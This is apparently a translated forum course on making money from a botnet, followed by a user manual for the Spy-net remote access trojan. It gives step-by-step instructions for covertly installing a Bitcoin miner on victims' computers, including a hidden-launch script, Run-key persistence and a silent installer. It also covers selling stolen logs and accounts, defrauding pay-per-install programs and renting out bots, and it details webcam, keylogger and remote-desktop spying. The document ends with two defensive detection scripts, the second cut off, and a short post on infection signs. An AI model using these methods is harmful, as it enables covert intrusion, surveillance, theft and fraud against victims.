(If you do not have a drop of conscience, then some might think of selling right away, changing the password beforehand before selling, but in this way there is a chance that the victim will restore access and thus our client who paid money for the account will lose it. I strongly advise against doing this . !)

2. After changing the password, the victim may suspect that something is wrong and start scanning his computer for our "malware". In most cases their attempts will be in vain, but you never know how deep he will dig, and there is a chance that the victim will decide to reinstall Windows, which is guaranteed to destroy our backdoor on his PC.

3. Checks from the buyer's side. The checks are different and more sophisticated each time. They check the IPs of the last visits, ask you to send photos of passports with registration and a handwritten receipt. Of course, most of them are easily dealt with, but such buyers are usually very petty. Personally, I didn't even spend time on such people.

Sale of logs and accounts
This is perhaps the most common type of botnet activity.

For those who don’t know, the log is a text file containing detailed information about every action of our victim. Simply put, all the information that our keylogger or stealer collects.

Logs can be sold as they are, that is, in the form in which they come to you on the ftp-server, or you can make a selection in the logs. Each method pays off well, but each has its own pros and cons.

Sale of pure logs.

The bottom line is to sell the logs that come to us on ftp. You can't think of anything easier; the only thing required of us is to select the required size of the log file before selling. The price depends on the size of the log file and the quality of the logs. The quality depends on what the logs were taken with. Logs taken by a keylogger are much cheaper than logs taken by a stealer or grabber.

The keylogger collects all the information (necessary and unnecessary): where the user went, what he wrote, i.e. a lot of garbage and unnecessary information. The buyer is mainly interested only in accounts and billing information.

A stealer or grabber collects and steals from browsers only passwords and logins from various resources. This option is convenient for us and for our customers, there is no need to dig in the logs to select accounts.

Now let's talk about the price.

The main criteria affecting the price of logs:

1. With the help of which the logs were removed. As already mentioned above, logs from a keylogger are of lower quality, therefore they are cheaper than logs taken by a stealer or grabber.

2. Country of logs. Or rather, the number of countries from which the logs were removed. For example, if the logs contain only information from users of one country (for example, Russia), then such logs are more expensive. If the logs contain information about users from different countries, then such logs are called Mix and, accordingly, are cheaper.

3. Check logs. Logs that were not used are more expensive than the logs in which they dug and collected all the cream. Although it is more a matter of your conscience.

The average price for 1MB of logs from a keylogger is $ 0.1-0.15.
The average price for 100 kb of logs from a stealer or grabber is $ 2-5.

Selling individual accounts.

If you do not feel sorry for your time, then you can dig in the logs and dig up a lot of interesting things. Believe me, your time will pay off.

As in the first option, logs can be sold but with a selection (it costs even more), that is, the buyer needs the accounts of a certain site. It is better to search for them in your database using a special checker. But in that case your base becomes used and devalued.

But instead of waiting for a client who asks for a selection, you can check your base for the accounts of the most common resources and post an advertisement for the sale of accounts of certain sites. Some single accounts are worth more than your entire base.

The most valuable accounts of such resources as - mailers, social networks, Internet auctions, e-wallets, game servers, site and server admins, various forums (mostly closed forums or forums for earning where reputation and registration date are valued)

Most bought accounts:
  • Google.com (mail, social network, channel);
  • Webmoney.ru (Mini);
  • Vk.com;
  • Facebook.com;
  • Odnoklassniki.ru;
  • Instagram.com;
  • Twitter.com;
  • Ebay.com;
Site administrator accounts also sell well, and so do accounts on carding, hacking and spam forums, especially closed ones. On such sites the registration date and reputation are very valuable, and some of them simply cannot be accessed otherwise. But people from such forums are rare in the logs, and accounts of these systems come across very rarely.

IMPORTANT POINT: Before selling accounts, review them manually; sometimes you come across very valuable accounts, especially on social networks. For example, accounts of administrators of large groups or accounts with a large number of friends and subscriptions. I think very few people will be able to use such accounts to their advantage ;)

Bitcoin mining
Many of you have a great idea of what bitcoins are and how to get them. But since the course is focused on beginners and they probably are present, it will not be superfluous to mention what it is.

Bitcoin is a digital currency (cryptocurrency). Bitcoins are mined using a client program that, using computer resources, computes block header hashes, for which bitcoins are awarded. For the generation of one block, 25 coins are given. The extraction of bitcoins itself is called "mining", which literally means the extraction of ore.

Bitcoin mining compares well to the miner's craft. Miners (i.e. we) are miners, and bitcoins are ore (let's say gold). It is difficult for one to mine ore, so miners are united in groups (pools) where all mining is distributed equally among the workers. And the deeper we dig the mine, the more difficult it is to extract ore, plus every day we have more competitors who also came to extract the same ore, which by the way is not endless.

But you and I are not some miners who work day and night to get the coveted penny for our work. For our purpose, we will recruit several hundred, and maybe thousands of slaves who will do our "dirty work" absolutely free! First of all, we need to decide on the client with which we will mine through our bots. There are plenty of such programs, but in my opinion it is preferable to use Phoenix 2.0.0.

This program is attached to the course, and you can download it here - bitcointalk.org/index.php?topic=75786

Downloaded, now we run the file phoenix.exe and we have the file phoenix.cfg. This is the configuration file for our miner. We open it.

We need to register the mining parameters in it. They should look like this:

[general]
autodetect = +cl -cpu
backend = http://user@host:port
backups = http://user@host:port
logfile = log
[cl:0:0]
autoconfigure = true
aggression = 5

The line "autodetect" indicates with what we will mine.

You can mine in 2 ways - using the CPU (Processor) and GPU (Video card). As a rule, video cards have better performance, so we specify the "cl" parameter, which just denotes the video card.

The lines "backend" and "backups" indicate the addresses of the pool, the main (backend) and backup (backups). We need to replace the values http://user@host:port with your address in the pool.

Everything under the line [cl: 0: 0] refers to the graphics parameters that assign the load on the video card / processor. The "aggression" line sets the speed at which our video card or processor will mine. The higher the speed, the higher the load. I do not recommend setting the "aggression" parameter more than 5, otherwise our victims will understand that something is wrong with their computers due to the heavy and frequent load on their video cards. We figured out the settings. Next, we need to select the pool through which we will mine.

In short, a pool is a server where many users unite who simultaneously generate a block, after which the reward is distributed equally among all participants in the process.

I personally recommend the 50btc.com pool for many reasons. I think almost everyone who mines or tried to mine in Russia uses it.

Other popular pools:
  • mining.bitcoin.cz
  • deepbit.net
  • bitminter.com
  • btcguild.com
  • btcmine.com
We register in it and get the address that we enter into the file phoenix.cfg in the lines "backend" and "backups". Here's an example of how it should look:

[screenshot: botnet30.jpg]

That is, the backup addresses in the 50btc pool that should go in the backups line look like this - pool2.50btc.com and pool-us.50btc.com.

The miner is set up and ready to go! Now we need to install it to our victims.

The first way.

This method will take a lot of time because this operation will need to be applied to each bot individually.

We open our Spy-net. Select the bot, right-click on it and select the very first item - "file manager".

[screenshot: botnet31.jpg]

The file manager opens. At the top, select the item %WIN% and we go to the Windows folder. (You can select any folder; it is important that the user does not find your folder with the miner.)

[screenshot: botnet32.jpg]

Right-click on any folder in the file manager and select the "Create folder" item and create a folder. The folder can be called whatever is convenient for you, the main thing is that it is not a stupid set of letters with numbers. Click Refresh.

[screenshot: botnet33.jpg]

Now we upload the miner files into our folder; for this we right-click and select the "Send file" item. The miner is now on the victim's computer. It remains to make it start automatically in hidden mode.

To do this, we need to create a script and register it in the registry. This is done simply. Create a txt file and write 2 lines there

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("filename", 0);

In place of "filename" we indicate the executable of our miner, Phoenix.exe. To be less conspicuous, we can rename the miner itself after any system service.
Now we save our txt under the name "filename.js", so we get a ready-made script.

The last thing left for us is to register it in the victim's registry.

Select the bot and right-click. We select the item "Registry editor" and the registry editor opens.

Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Right-click on the right field and select "New - String value"
A window opens where in the name field we specify the name of the parameter, and in the data field we specify the path on the victim's computer to our script. I recommend that you always put the script in one place so as not to get confused.

Now our miner always starts when you turn on the computer in stealth mode.
The miner can only be seen in the task manager's process list; if you rename it after any system file, the victim will never find it. In principle, even if the file is left with its original name, it is unlikely to catch the victim's eye, because few people rummage through the task manager looking for unnecessary running processes.

Second way.

This method is suitable for mass uploading of the miner to our bots.

To do this, you need to create an installer for unpacking our miner in hidden mode and registering it in the registry.

To do this, you can use any similar packers, but I will give an example using the already familiar Smart Install Maker.

We open. In the Information menu. We need to change the name and choose the path to save the installer. We come up with any name (the main thing is that it would not be gibberish), all items - version, company, website, support - fill in at our discretion and in the "save as" column, a convenient way for you to save the
installer. Leave the compression type unchanged.

[screenshot: botnet34.jpg]

Go to the Files menu. In the menu in the lower right corner there is a shortcut - "add files from folder", click on it. Find the folder with our miner and click OK. All files of our miner have been added to the file list. Now we select the directory where our miner will be extracted after installation.

I recommend using the directories %AppData%, %ProgramFiles%, %SystemDir%, %WindowsDir% (these are the folders where the miner will be installed) and selecting an existing folder in that directory. For example: %ProgramFiles%\Windows Life

Leave the rest as in the screenshot: If the file exists: Replace. Uncheck the box "Uninstall".

Go to the Requirements menu. Put a tick in the item "Close running applications". In the line "Searched string" enter Phoenix.exe. In the line "Search type" select the name of the application file.

Dialogues menu. Here we just need to put a tick above the topmost item, "Hidden installation".

Registry menu. In the bottom menu on the right there is a shortcut, "Add". Click on it and a window pops up. Specify the root key: HKEY_LOCAL_MACHINE.
Specify the subkey: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
You can specify any parameter name. Leave the value type the same. In the Value, write the unpacking path, %ProgramFiles%\Windows Life, and uncheck the box "Uninstall".

botnet35.jpg


Command menu.

Again, in the lower right menu find the shortcut "Add" and click on it; a window opens. In the command Type line, leave "application".
To the right of the "Command" line, find the shortcut "select a file from the list of files used", click on it and select the line ending in phoenix.exe from the list. Leave the parameters empty. Run as: select "Hide". When to execute: select "after unpacking".

Uninstaller menu, Settings. Uncheck the box "Create uninstaller". We are finished with the settings; now click on the "Compile" shortcut in the top menu and create our installation file. Now we need to deliver this installer to the bots.

botnet36.jpg


Everything is very simple: go to Spy-net, select our bots, right-click and select the item Send file and -> Run hidden, then select our installer from the list. Thus, it will be downloaded, installed and run in stealth mode.

botnet37.jpg


Bypass bans

All large pools are aware of botnets and therefore have an extremely negative attitude towards them. If you have a serious network of bots and you are going to mine on a large pool, it is unlikely that anything will come of it. But there are some ways to help you avoid getting banned.

1. There are a lot of miners on large pools, and therefore it is difficult for the pools to keep track of each of them. But if one miner stands out for its capacity, such a miner is easy to notice, and if they notice it, they will notice that several hundred IP addresses are accessing its worker. This may indicate that bitcoins are being mined from several hundred computers at once and not by one user. Naturally, such workers are immediately frozen until the reasons are clarified.

So that such situations do not arise, our bots need to be divided between accounts. That is, a certain number of bots must be allocated to each account. Let's take the 50btc pool as an example. The optimal number of bots per account is no more than 30 bots, with a power of no more than 1 GH/s. If you strictly follow these criteria, there will be no problems with freezing; at least I did not have such problems. Yes, the only problem is that if you have a large number of bots you need to create many accounts, but while you are gaining momentum, at the initial stage you will not have so many bots, so you do not need to create dozens of accounts a day. And when you are already well spun up, you can think about your own pool for your bots.

2. Since we are positioning our botnet as legal, why not take advantage of our agreement. Honestly, I started working with licensing agreements only because of mining.

If our account has been frozen, then the only chance to unfreeze it is a conversation with the support or the pool administration.

Without obscenities, insults or accusations, we describe the situation: we have an agreement with users who have a miner installed with our data, these users are aware that bitcoins are mined with the help of their machines, and we provide support with our agreement, the installer and the source from which the installer is downloaded (the installer has to be remade for an open installation and re-uploaded).

After some time (usually from a day), our account is unfrozen. There were cases when support did not react at all. In such cases, it is best to write to them by e-mail or on social networks.

Promotion of affiliate programs
Surely many of you have come across PPs (affiliate programs) and tried to make money on them (most likely some even did).

PPs come in different kinds: pay-per-click (PPC), pay-per-action (CPA), and so on, but we'll talk about PPIs.

The main PPs with payment for installation on the Runet are - Profitraf.ru and Loadmoney.ru
We'll consider Profitraf.ru.

Let's start with the fact that in order to work normally with these PPs, you need a site with download traffic, that is, any site where various software, games, etc. are posted.

You don't have to have a popular site. You can knock together a site on uCoz and fill it with dozens of programs.

Since our traffic will come from a botnet, we only need a site to make it appear that we have a site from which we are pouring traffic (although our bots are live and targeted traffic, the PP administration does not need to know that the traffic is coming from a botnet).

So, we have created a website, uploaded several programs there - it's done!

Now let's move on to registration.

To register at Profitraf.ru you need invites (invitations). It is not difficult to get them: just go to the site Profitraf-invite.ru, enter your e-mail there and instantly get an invite.

I think everything is clear with registration.

After registration, we need to add our site. Go to the "sites" menu, fill in all the fields and to check them, do not forget to add the file "a4dadd7.html" to the root folder (the main folder where the rest of the folders and files are located) of your site.

Usually it takes no more than a day to wait for confirmation.

When your site is confirmed, go to the "code setup" menu.

The bottom line is to change the code for downloading our files with the substitution of their domain.
I will not describe the whole process of changing the code; everything is described in detail there (if you created a site on uCoz, there are separate settings for such sites).

So, we have changed the codes; now we need to drive traffic to our downloads. To do this, select bots (I do not recommend downloading files to large batches of bots at once, because it can be tracked) and select the "Download and execute file" item.

botnet38.jpg


In the window that appears, enter the direct download link and click OK, after which a window will pop up asking - "Do you want to run in hidden mode?". Click "Yes".

Such shenanigans can be done with any PPI affiliate networks, I do not recommend limiting yourself to one PP, because we always have traffic and PPs are getting more and more every month.

botnet39.jpg


Rental
If you have a decent network of bots and you are too lazy to do anything or figure out how to make money on them, then the easiest way is to simply rent it out. Or, alternatively, you can collect bots for yourself and separately for rent. But the most interesting thing is that by renting it out, you can still use it (only the tenant does not need to know about this).

Now let's talk about the price. The optimal price for renting a botnet is $0.10-0.15 per bot. However, there are very few offers for renting a botnet and therefore the price can be overstated. You can set the price depending on your appetite, but not less than 10 rubles per bot.

Now let's calculate: it is possible to build a network of several thousand bots in a month (if at the same time you take actions to distribute the backdoor every day).

Well, for example, let's take the smallest figure: 1000 bots per month at $0.1 per bot = $100 per month. Even such a price per month is not a bad reward for a month of effort, given that you can then do almost nothing (unless you just update the backdoor) and keep renting the botnet out. In this matter, no one limits your numbers: you can set a higher price, you can build up the network further.

To all this I want to add that now you have in your hands a unique tool that is suitable both for making money and for other pranks. Those ways of making money that are presented in the course are a small fraction of all the ways that exist and you can still think of. Yes, many of the methods require special functions that this backdoor does not have. But I can say with confidence that there are no Trojans that have all the functions at once.

But the backdoor has the function of uploading files to the victim. So nothing stops you from planting new Trojans with other functions on your bots. These can be grabbers of certain resources (banks, sites), drug traffickers (votes, views, uniques), spammers, DDOSers, etc. The scope for imagination is endless.

Every year, new types of earnings appear on the network, and with the help of a botnet, it will always be possible to earn money on new topics for making money.

You need to work on building your own network of bots every day, as elsewhere. To succeed, you need to work every day. The more days you devote to working with a botnet, the larger your network of bots will be and, accordingly, the more income you will have. Each new bot is a "ruble" in your pocket.

The more bots and sources of income connected to them, the more you earn. If one source of income runs out, look for a new source. After all, you have a tool that can siphon resources from almost anywhere. The most interesting thing is that with the help of our tool you can download resources from several places at once. The most important thing is how to overcome your laziness and go to success.

Yes, it will not be easy for someone, but before thinking that it is difficult, ask yourself a question - are you doing everything to make it easier for you and how much time do you devote to this business? The more you work and devote time to building your network, the faster it will grow! Remember!

Addition
As soon as we created the backdoor and the first bots appeared, the question arises - how to manage them and what functions the server has.

In the Spy-net client window, select any bot and right-click on it.

botnet40.jpg


We see a long list. These are all functions for managing our bots. Let's sort them out in order!

1. "File manager"

By clicking on this item, the file manager of our bot opens.

botnet41.jpg


At the top there are 2 tabs - "file manager" and "search file". The first tab is the file manager itself, and the second tab is useful for finding the desired file, you just need to enter the name of the desired file, everything is simple.

Under the "file manager" tab we see 2 address lines for quick transition to standard folders:
  • %WIN% - "WINDOWS" folder;
  • %SYS% - "System32" folder;
  • %RECENT% - recent files and documents;
  • %DESKTOP% - desktop;
  • Local drives and removable media.
Let's choose C: - Local Disk. The path C: appears in the address bar and the folder of the local disk is opened. Right-clicking on the desired file or folder will open the file management menu. Let's consider it in more detail:

botnet42.jpg


Refresh - refresh the list of files and folders;
List shared network folders - get a list of shared network resources. The list is added to the left menu in the FM header;
Download folder - download a folder;
File download - download a file;
File download (recursive) - download a file, keeping the folder structure;
Send file - upload a file;
Send file (FTP) - send a file to an FTP server;
Add to download list - add to the download list. The download will not happen; the client will wait for your command to start the download. The file will go to the bottom of the FM;
Run - run the file. There are 2 options: in stealth mode and normal;
Delete - delete a file;
Rename - rename;
Copy - copy;
Paste - paste;
Create folder - create a folder;
Set as wallpapper - set the picture as the desktop wallpaper;
Show image - view the picture. A thumbnail of this image will be displayed in the lower part, in a black square;
Attributes - change file attributes;
Open folders of downloads - a window opens with what you downloaded from the victim's file system. Actually, all downloaded files will be located here. The keylogger logs are also stored there.

At the bottom of the file manager, there is a field for all uploaded and downloaded files.

botnet43.jpg


This field also has its own items for managing files:

Pause the transfer - pauses the download of a file (folder);
Start / Restart the transfer - start loading;
First position - move to the first position of the list;
Up position - move up one position;
Down position - move down one position;
Last position - move to the last line of the list;
Delete transfers complete - remove completed transfers from the list;
Delete transfer - delete a download;
Stop download folder - stop downloading a folder;
Open folders of downloads - opens a list of files downloaded from the victim.

2. "Keylogger"

Click on the "Keylogger" menu and a window opens. Everything is simple and straightforward.

botnet44.jpg


On the right we see 4 points:

Download - download the current log from the victim;
Delete - delete the current log;
Save - save the log in text format;
Disable - disable keylogger logging;

I note right away that there is one drawback in the keylogger - it does not understand the Cyrillic alphabet.
It's best not to be stingy, order a normal keylogger and upload it to your bots.

3. "Registry editor"

Selecting the menu "Registry editor", we open the registry editor of our bot.
Everything is like in a regular registry editor.
To create a key, right-click and select the "New" item:
"String" Value - a string parameter
"Bynary" Value - a binary parameter
"DWORD" Value - a DWORD parameter (32 bits)
"Multi-String" Value - a multi-string parameter

botnet45.jpg


4. "DOS Promt"

When opened, a blank window appears. Right-click on an empty window to open the menu.

botnet46.jpg


Let's analyze the menu items:
  • Enable - enable DOS;
  • Disable - deactivate DOS;
  • Save - save the contents of the window;
  • Exit - exit.
PS: This is not a DDOS attack feature. This is the DOS command line.

5. "Clipboard"

This menu opens the contents of the victim's clipboard to us. For those who do not know, the clipboard is a copied piece of information (file, text) in order to paste it in the right place. To see the clipboard of our bot, you need to click the "refresh" button in the lower right corner. And in order to change the clipboard of our bot, press the "Set" button and set your value.

botnet47.jpg


6. "Device list"

In this menu we see a list of installed equipment on the bot's PC.

botnet48.jpg


7. "Active ports list"

After the window has opened, press the "refresh" button and we see a list of open ports. Also in this window you can see information about the local and external IP addresses, protocol, port status and the process through which the port is open. Our server is highlighted in red.

botnet49.jpg


By right-clicking on any line, a menu will appear:

Refresh - refresh the window;

DNS resolve - change the look of a remote IP to its DNS records. After setting this parameter, you need to refresh the window;

End connection - close the connection;

Kill Process - kill the process that opened the port;

Exit - exit.

8. "Installed Programs"

Selecting the item "Installed programs", press the "refresh" button in the lower right corner and a list of installed programs appears. By right-clicking on a program, a menu will appear:

botnet50.jpg


  • Resfresh - refresh the window;
  • Uninstall - uninstall a program. The program's uninstall window will appear in visible mode, so being noticed on the bot's side is guaranteed;
  • Exit - exit.
9. "Windows list"

In this menu, we see the entire list of windows for our bot.

botnet51.jpg


Right-clicking on the window will open a menu:
  • Refresh - refresh the window;
  • Close - close the window;
  • Maximize - maximize the window to full screen;
  • Minimize - minimize to the taskbar;
  • Show / Restore - show / restore;
  • Hide - hide;
  • Minimize all - minimize all windows to the taskbar;
  • Rename - rename the window;
  • Lock button [X] "Close" - prohibit closing this window;
  • Unlock button [X] "Close" - allow closing this window
  • Exit - exit.
Those windows that are highlighted in gray are launched in hidden mode or minimized.

10. "Service list"

In this menu, we see all the running services of our bot.

botnet52.jpg


You can also see which of them are launched by status. By right-clicking on the service, we open the menu:
  • Refresh - refresh the window;
  • Start - start the service;
  • Stop - stop the service;
  • Uninstall - remove a service;
  • Install - install the service. We indicate the name of the service, its description, and the path to the file;
  • Exit - exit.
11. "Processes list"

In this menu, we see all the running processes of our bot. This menu is somewhat similar to the task manager with the only difference - you cannot remove and install.

botnet53.jpg


12. "Capture audio"

This function allows you to capture sound from our bot's computer. That is, we can listen to what our victim is listening to right now. We can listen to exactly what is being played on the computer at the moment, not to what is happening in the room as through a microphone.

botnet54.jpg


In this menu, you can set the channel frequency and sound quality.

13. "Remote Desktop"

This feature allows you to capture desktop actions in real time.

botnet55.jpg


While we watch the bot's desktop, the victim will not notice or suspect anything. On the left side, we have 3 buttons:
  • Single - Refreshes the window once. Clicked - updated;
  • Start - start constant updating of the window;
  • End - stop constantly updating the window.
Under the buttons we see the "Interval" field. The interval for saving frames is set here. By ticking the “save” box and selecting a certain interval, the backdoor will start screening the desktop at a certain interval and all screenshots will be uploaded to the “Desktop” folder, which will be located in the folder of our spy-net client.

At the bottom there are items "Mouse" and "Keyboard". By selecting them, we will be able to control the victim's desktop using our mouse and keyboard, but our cursor will not be visible to the victim.

The slider bar at the bottom adjusts the image quality of the desktop. The higher the quality, the more the image will slow down.

14. "Capture Webcam"

This function allows you to capture images from a webcam.

botnet56.jpg


The window is similar to the previous desktop capture window. There are also buttons on the left:
  • Start - start capturing a webcam;
  • End - stop capturing the webcam.
Just like with the desktop capture function, you can save frames here. We select the interval and put a tick in the "save" item.

15. "Extra options"

This menu is sort of an additional option to control. There are 3 tabs with different functions.
  • Message box;
  • Miscellaneous;
  • MSN messenger.
So, let's analyze each one.

"Message box"

This function is rather useless. It allows you to send messages to the victim in the form of error notifications. There was a similar function when the server was created.

botnet57.jpg


"Miscellaneous"

This function is also not so useful, but you can amuse yourself. Using this function, you can control the victim's PC - turn off or restart the PC, or turn off the monitor. The whole list of functions:
  • Start button - hide / block the Start menu;
  • Desktop icons - hide / block icons on the desktop;
  • Taskbar - hide / lock the taskbar;
  • Mouse and keyboard - block the mouse and keyboard;
  • System tray icons - hide icons from the system tray;
  • Disk tray - open / close the CD-ROM tray.

botnet58.jpg


"MSN messenger"

Sends messages through the victims' MSN accounts.

botnet59.jpg


16. "CHAT"

The function allows you to conduct a dialogue with our victim through the opened chat window. I think this function is useful only for the purpose of mocking.

botnet60.jpg


First, we need to set the chat parameters.
  • Chat Windows title - the name of the chat window;
  • Server name - victim's nickname;
  • Client name is your nickname.
After we have finished with the settings, we send a message to the victim and a chat window appears on the victim's desktop that she cannot close. You can also conduct a dialogue with several victims at once.

17. "Desktop image"

Using this function, you can take a screenshot of the victim's desktop and it will appear in the upper right window of the Spy-net client.

18. "HTTP proxy"

A very useful feature. With its help, you can make a proxy server out of the victim.
I.e., we will sit behind our victim's IP. We select this function, specify the port, press "start" and use it.

botnet61.jpg


19. "Passwords"

This function is responsible for collecting saved passwords from the victim's browsers. But the big minus is that this function only works with the IE browser and old versions of Opera and Mozilla.

20. "Search ..."

This function is necessary to search for the necessary files on the victim's computer or search for words in a keylogger. We choose which of the search options we need and enter the word that we need to find, at least 3 characters. Click OK and a window appears with a list of victims who have this file or word in the logs.

21. "Download and execute file"

This function allows you to download from the network and run files on the victim's computer. The extension can be anything.

botnet62.jpg


In the window, enter a direct link to the file we need and click "OK". Next, it will ask whether to run the file in hidden mode. We choose "Yes".

22. "Open WEB-page"

This function can open any web page from the victim's computer. Just enter the link where you want to go, click "OK" and the page opens in the default browser for our bot.

botnet63.jpg


23. "Run command"

The function allows you to launch an application with an additional parameter. Similar to the Run command in Start.

botnet64.jpg


24. "Send file and ..."

This function allows us to send our bots any file that is on our PC and run it in hidden mode or in normal mode.

25. "Update server"

Server update function.

There are 2 ways:

From local file - we take a new server file from our computer, where the client is located;

From URL - from a server on the Internet. The link must be a direct link to the new server.

Thus, if there is a need to make changes to the server (the address or ports have changed), you can update it in this way.

26. "Ping"

The function allows you to ping our bots, that is, to check the connection speed.
The quality of the connection can be determined by the color of the squares in the "identification" field.

If the connection is good, the square is green.

If bad, the square is red.

If there is no connection, the square is white.

Everything is logical)

27. "Recconect to adress ..."

The function will allow us to redirect our victims to a different address or port.

28. "Disconnect"
Disconnects the connection with the victim; after a restart the victim will be on the list again.

29. "Uninstall"
Completely destroys our Trojan on the victim's computer.

30. "Rename"
The function allows you to change the name and identifier of our server.

incashwetrust.biz
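The persistence described in the post above relies on two things a defender can enumerate on any Windows host: an autostart value under HKLM\...\CurrentVersion\Run that launches a script via wscript, and an installer that drops a binary into a freshly made folder and registers it in the same key. The following is an added defensive example, not code from the post or from any tool it mentions: it parses a constructed `.reg` export of the Run key and reports values that are not in a known-good baseline, that invoke a script host, or that point into a user-writable directory. The value names, the baseline and the sample export are all constructed for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Iterator, List, Set, Tuple

# Only autostart keys are audited; the rest of the export is ignored.
RUN_KEY_RE = re.compile(
    r"^\[(HKEY_[A-Z_]+\\.*\\CurrentVersion\\(?:Run|RunOnce)(?:\\[^\]]*)?)\]$", re.I)
# "Name"="Data" lines of a .reg export; '\' and '"' inside are escaped with '\'.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)+)"="((?:[^"\\]|\\.)*)"$')

SCRIPT_HOST_RE = re.compile(r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b")
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|vbs|vbe|hta|ps1)\b")
# Locations an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "%userprofile%",
                 "\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


@dataclass
class Finding:
    key: str
    name: str
    data: str
    reasons: List[str] = field(default_factory=list)


def _unescape(s: str) -> str:
    # .reg REG_SZ data escapes backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value name, value data) for every value under a Run/RunOnce key."""
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = RUN_KEY_RE.match(line)
            current = m.group(1) if m else None
            continue
        if current is None:
            continue
        m = VALUE_RE.match(line)
        if m:
            yield current, _unescape(m.group(1)), _unescape(m.group(2))


def classify(data: str, baseline_lower: Set[str]) -> List[str]:
    """Return the reasons an autostart command line deserves a look (empty = benign)."""
    low = data.lower()
    if low in baseline_lower:
        return []
    reasons = ["not_in_baseline"]
    if SCRIPT_HOST_RE.search(low) or SCRIPT_EXT_RE.search(low):
        reasons.append("script_host")
    if any(marker in low for marker in USER_WRITABLE):
        reasons.append("user_writable_path")
    return reasons


def audit_run_entries(reg_text: str, baseline: Set[str]) -> List[Finding]:
    baseline_lower = {b.lower() for b in baseline}
    findings = []
    for key, name, data in parse_run_entries(reg_text):
        reasons = classify(data, baseline_lower)
        if reasons:
            findings.append(Finding(key, name, data, reasons))
    return findings


# Constructed sample export (what `reg export` of the Run key looks like), not real data.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="wscript.exe \"%AppData%\\sys\\update.js\""
"Windows Live"="\"C:\\Program Files\\Windows Life\\phoenix.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Example]
"DisplayName"="Example"
'''
# Constructed baseline of autostart command lines known to be legitimate on this host.
BASELINE = {r"%windir%\system32\SecurityHealthSystray.exe"}

if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_REG, BASELINE):
        print(f"{f.key}\\{f.name}: {f.data} -> {', '.join(f.reasons)}")
```

On a live host the input comes from `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg` (the file is UTF-16, so open it with `encoding="utf-16"`); run the same audit over HKCU and the RunOnce keys, and keep the baseline as the exact command lines observed on a clean build rather than bare file names, since the post's whole trick is a plausible-looking name in an unexpected folder.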
 

Teacher (Professional; 2,673 messages, reputation 9, reaction score 688, points 113)
A botnet is a network of zombified computers. Roughly speaking, this is a virus that subjugates your computer to itself, and you will hardly notice it. This is one of the most dangerous cyber threats to date.
Why one of the most dangerous? Because a botnet is simply bursting with opportunities.

I will divide them into several categories:

1. Loader. Allows you to download any game from the Internet to your computer. Update the virus itself, install another, install some program, whatever.

2. Spam. Have you ever received an e-mail saying that an inheritance has fallen to you from abroad?)) Well, most likely this letter was sent through a botnet. About 80% of all spam worldwide is sent in this way, which is billions of emails.

3. DDoS. DDoS is such garbage that attacks other computers or servers by sending an ungodly number of requests, which in the end either completely takes the computer or server down or slows its work a great deal. One of the successful and well-known attacks is considered to be an attack on Microsoft servers. A Trojan virus called "MSBlast!" simply began hammering microsoft.com with requests from all infected computers, because of which the site did not work for quite a long time. I think you yourself understand that taking down Microsoft's site is no easy task, let alone small sites) A botnet is fatal for them.

4. Keylogger. With the help of a virus, a hacker can capture and save all the characters entered on the keyboard. Logins and passwords, personal correspondence, payment data... Damn, all of that can end up in the wrong hands.

5. VNC. Remote access to PC. That is, the botnet owner can use your computer in the same way as you. Often used for mining cryptocurrencies. One of the most popular types of botnet use, as everyone wants a lot of bitcoins)

6. Proxy. They use your IP address as a proxy server. You understand, very few people bother that much with anonymity unless they are engaged in dark deeds) And then go prove you are not a camel, because your IP address will be in Comrade Major's logs.

How to understand that your computer is infected?
1. Unknown files / folders in system folders
2. The computer spontaneously reboots and / or turns off
3. Unknown processes in the task manager
4. Unknown programs are registered in the PC startup

There are a lot of items, friends.

What to do if already infected?
Check your computer for viruses and delete those found, clean the registry. If it does not help, you will have to reinstall the system and format all disks.

How to protect your computer from such a threat?
Yes, standard recommendations, because the botnet is the same virus) Do not open suspicious links, do not download incomprehensible files, periodically check your computer with an antivirus program.
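The indicators in this post ("unknown processes in the task manager") and the "Active ports list" and "HTTP proxy" sections of the earlier post both come down to the same observable: a process that should not be talking to the network is listening on a port or holding an outbound connection. The following is an added defensive example, not code from either post or from Spy-net: it correlates constructed `netstat -ano`-style output with a constructed PID-to-image-path table and reports sockets owned by processes that run from a user-writable directory or that borrow a system binary's name outside the Windows directory. All addresses, PIDs and paths are made up for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One line of `netstat -ano`: proto, local, foreign, optional state (absent for UDP), pid.
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")

# Locations an unprivileged dropper can write to; services do not normally run from here.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
# Binaries that legitimately exist only under %SystemRoot%; a copy elsewhere is a lookalike.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe", "services.exe"}


@dataclass
class Socket:
    proto: str
    local: str
    remote: str
    state: str
    pid: int


@dataclass
class Finding:
    pid: int
    image: str
    socket: Socket
    reasons: List[str] = field(default_factory=list)


def parse_netstat(text: str) -> List[Socket]:
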